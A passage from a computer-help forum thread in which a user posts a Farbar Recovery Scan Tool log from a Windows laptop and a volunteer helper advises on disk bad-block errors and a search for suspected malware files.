    Task: {89D2A8B6-4765-4DCA-85AD-7596FECFB286} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {8EBEC732-67C6-4823-8F6D-D49219079BB5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {963EEFD3-C066-4DFC-B419-A76DB6073FFB} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-01-03] (Bitdefender)
    Task: {9F965779-1CB2-4D42-BC03-7B29DC26B7B7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH45U581RP => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {A6F5043F-81F4-4E57-B0B6-BF0997939F31} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {AE327D73-DB64-440F-9FF4-02DC16AA63C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
    Task: {B25BDC00-270D-45CD-8FF5-1E12386E6D52} - System32\Tasks\HPDAS => C:\Program [Argument = Files\HP\HP ePrint\HP.DeliveryAndStatus.Desktop.App.exe /CheckJobs]
    Task: {B787AC15-AED2-454D-A6A1-3EDF53CA38BA} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec-Logon => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {BB173364-607B-493A-935B-E5D7832968E5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-28] (AVAST Software)
    Task: {E5AF5C26-359C-43CC-BF3F-29807CD26CDD} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-04-04] ()
    Task: {EF0F5F72-921B-416D-89FD-4102E543E277} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2016-12-15] (HP Inc.)
    Task: {F3EA5147-1530-4527-9731-26F30F8AE0E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
    Task: {F4CC15E9-94C3-43C0-A478-E0AE034F0175} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-01-14] (Intel® Corporation)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\HP\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square

    ==================== Loaded Modules (Whitelisted) ==============

    2017-02-01 08:44 - 2013-09-03 14:29 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
    2017-02-01 08:44 - 2016-11-14 16:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpbr.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpdsp.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 03202816 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpph.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 01542976 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttprbl.mdl
    2016-08-06 14:07 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    2017-01-10 17:37 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
    2017-01-10 17:37 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
    2017-01-10 17:37 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
    2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
    2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
    2016-04-01 13:57 - 2016-12-28 12:03 - 08924864 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
    2017-02-01 08:44 - 2017-01-13 13:51 - 00023328 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\en-us\bdsystray.txtui
    2016-09-29 12:48 - 2016-09-29 12:48 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
    2017-01-10 22:45 - 2016-12-21 01:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2017-01-24 21:46 - 2017-01-24 21:46 - 03865600 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)

    AlternateDataStreams: C:\Users\Joseph\Downloads\AdwCleaner.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\FRST64.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT (1).exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe:BDU [0]

    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ===============================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2015-10-30 02:24 - 2017-02-02 11:45 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
    DNS Servers: Media is not connected to internet.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==


    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [vm-monitoring-nb-session] => LPort=139
    FirewallRules: [{0308E923-8487-403F-B445-D15ED8CCCB95}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
    FirewallRules: [{E42A29D0-C19D-4D1C-8FE2-D850981AEBA8}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
    FirewallRules: [{29F940E0-B1B5-45D6-9E75-4BECF8FB67FC}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
    FirewallRules: [{B3262CE0-7120-40CC-B8E9-77C75A53DBCA}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
    FirewallRules: [{F580D45B-9B87-4478-9D02-4FB5710B4EE2}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
    FirewallRules: [{6C97C639-83FE-4D5D-A976-D178E54ACEBA}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{D49EDF57-C52E-467F-A056-63D5BD0738D7}] => C:\Program Files\Intel Corporation\Intel WiDi\SmartAgentTest.exe
    FirewallRules: [{261EA2B7-45BC-4067-83D5-2418ADCEE9C8}] => C:\Program Files\Intel Corporation\Intel WiDi\Next\WirelessDisplay.exe
    FirewallRules: [{B59EE6A4-D725-4298-9685-DFD41B59B982}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiAppOld.exe
    FirewallRules: [{CF4CA95C-09CF-4959-9D76-68426CDA477D}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
    FirewallRules: [{080A3C37-1740-4E2C-815C-189C744E6E60}] => c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
    FirewallRules: [{A9134569-28FB-4867-B6F4-AA1D2E5E15EE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{0334F46F-ABB7-4487-AA0B-5C39528FE3FC}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{A0CD17AF-60E5-44AE-AC27-9328A673AC89}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{970594D0-4429-4C70-838A-D147ED3FC01F}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{DBA71186-0545-49C3-8B27-EF841C1940ED}] => C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
    FirewallRules: [{EA52B792-A898-4EF8-AD47-E12D2BF5BD0A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
    FirewallRules: [{A89935E6-6E46-4459-BA52-726242012FAF}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
    FirewallRules: [{2C60681B-0038-4452-ADDE-3FC15C74708A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
    FirewallRules: [{0790D2E9-EA09-4D41-BA01-B8BC78ECD5DA}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{DDE9F5AC-0598-494C-89AB-659FD2D18BBB}] => C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
    FirewallRules: [{C5ABB8F3-9C6A-48E2-9E61-D7DFAF7B05F7}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
    FirewallRules: [{D4F608B2-F97B-4617-8A32-8CEA999C5E3D}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{C23C9D12-7310-4478-8E06-5C73C5D2AC72}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{F04FC8DC-884B-4DD1-8B0B-79F29AED26C0}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{009CC8D2-7203-4597-901D-185455F173D9}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{5151A207-2082-465F-96EB-697F284CEFD2}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{A75B0F26-5FC7-48B3-8D4D-90756AE6443A}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{80B7AC85-64A5-4029-9123-68203C3004D3}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe

    ==================== Restore Points =========================

    24-01-2017 15:52:44 Scheduled Checkpoint
    31-01-2017 20:53:13 end January 2017
    01-02-2017 17:15:49 JRT Pre-Junkware Removal
    01-02-2017 17:24:34 JRT Pre-Junkware Removal

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/02/2017 10:34:26 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel was terminated because it took too long to suspend.

    Error: (02/02/2017 10:20:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.ShellExperienceHost_10.0.14393.693_neutral_neutral_cw5n1h2txyewy+App was terminated because it took too long to suspend.

    Error: (02/02/2017 10:20:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/02/2017 10:19:09 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/02/2017 10:12:33 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/02/2017 10:09:45 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/01/2017 09:23:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/01/2017 09:20:30 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/01/2017 09:18:22 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: IntelCpHDCPSvc.exe, version: 1.0.0.1, time stamp: 0x572a4b65
    Faulting module name: ntdll.dll, version: 10.0.14393.479, time stamp: 0x5825887f
    Exception code: 0xc0000005
    Fault offset: 0x000000000002f7db
    Faulting process id: 0xd20
    Faulting application start time: 0x01d27cfa9f3c35eb
    Faulting application path: C:\WINDOWS\system32\IntelCpHDCPSvc.exe
    Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
    Report Id: a8ea9bde-d760-4dbc-832c-0766ee78aa5b
    Faulting package full name:
    Faulting package-relative application ID:

    Error: (02/01/2017 09:18:16 PM) (Source: DPTF) (EventID: 256) (User: )
    Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR

    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
    Executing Function:  PolicyBase::takeControlOfOsc
    Message:  Failed to acquire OSC: Failure during execution of _OSC:
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
    Executing Function:  EsifServices::primitiveExecuteSet
    Message:  Error returned from ESIF services interface function call
    Participant:  NoParticipant
    Domain:  NoDomain
    ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
    ESIF Instance:  255
    ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]


    Policy:  Passive Policy 2 [2]


    System errors:
    =============
    Error: (02/02/2017 12:06:30 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:26 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:22 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:18 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:14 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:10 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:06 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:02 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:05:59 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:05:55 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.


    CodeIntegrity:
    ===================================
      Date: 2017-02-01 21:18:20.909
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-02-01 21:18:20.659
      Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


    ==================== Memory info ===========================

    Processor: Intel® Core™ i7-6500U CPU @ 2.50GHz
    Percentage of memory in use: 19%
    Total physical RAM: 16273.91 MB
    Available physical RAM: 13087.01 MB
    Total Virtual: 18705.91 MB
    Available Virtual: 15448.3 MB

    ==================== Drives ================================

    Drive c: (Windows) (Fixed) (Total:913.93 GB) (Free:831.09 GB) NTFS
    Drive d: (RECOVERY) (Fixed) (Total:16.35 GB) (Free:1.88 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive e: (Disc1) (CDROM) (Total:1 GB) (Free:0 GB) UDF

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 931.5 GB) (Disk ID: D379171D)

    Partition: GPT.

    ==================== End of Addition.txt ============================


    • 0

    Advertisements


    #11
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    I run the Disk Error Tool and it showed no errors... Is there anything else I can try?


    • 0

    #12
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    Thank you for all of your help! 


    • 0

    #13
    RKinner

    RKinner

      Malware Expert

    • Expert
    • 20,031 posts
    • MVP

    I do not see my search.txt file.  Did you perhaps hit SCAN instead of File Search?  Please try it again.

     

    As far as the bad block error is concerned it appears to still be there.  Somewtimes you have to run the disk check several times to clear it.  Windows is a bit odd on hard drive numbering so if you have any other drives, even USB type then run the disk check on them


    • 0

    #14
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    Got it! sorry about that

     

     

    Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (02-02-2017 13:06:15)
    Running from C:\Users\Joseph\Downloads
    Boot Mode: Normal

    ================== Search Files: "update_w32.exe;prtj.exe;svpn.exe;Book.xlt;Sheet.xlt" =============

    ====== End of Search ======


    • 0

    #15
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    I did regular search, not regestry search


    Edited by mw201, 02 February 2017 - 12:17 PM.

    • 0






    Similar Topics

    0 user(s) are reading this topic

    0 members, 0 guests, 0 anonymous users

    As Featured On:

    Microsoft Yahoo BBC MSN PC Magazine Washington Post HP